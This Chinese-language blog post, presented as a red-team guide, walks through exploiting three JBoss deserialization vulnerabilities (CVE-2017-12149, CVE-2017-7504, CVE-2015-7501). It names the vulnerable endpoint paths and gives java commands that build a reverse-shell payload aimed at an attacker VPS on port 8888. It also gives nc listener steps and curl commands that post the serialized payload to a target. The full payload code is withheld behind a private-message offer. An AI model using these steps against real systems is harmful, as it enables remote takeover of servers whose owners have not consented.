优秀的编程知识分享平台

网站首页 > 技术文章 正文

红队攻击之利用jboss反序列化获取目标权限漏洞梳理

nanyue 2024-10-23 12:09:03 技术文章 2 ℃

JBOSS AS 6.x反序列化(CVE-2017-12149)

漏洞影响5.x和6.x版本的JBOSSAS

1、检测目录 192.168.28.138:60899/invoker/readonly

2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap your_vps_ip:8888

3、nc监听上述反弹shell端口

4、向目标发送生成的序列化文件即可收到反弹shell

curl http://192.168.28.138:60899/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

5、接收反弹shell

JBOSS AS 4.x JbossMQ JMS反序列化(CVE-2017-7504)

影响范围:JBoss AS 4.x及之前版本。跟CVE-2017-12149使用同样的payload

1、检测目录192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet

2、nc监听

3、发送payload getshell

curl http://192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

4、接收反弹shell

JBOSS Java反序列化(CVE-2015-7501)

也就是15年出来的Java反序列化漏洞

1、检测目录192.168.28.138:57287/invoker/JMXInvokerServlet

2、直接利用Java反序列化工具即可


私信“jboss”获取利用代码及工具。

Tags:

最近发表
标签列表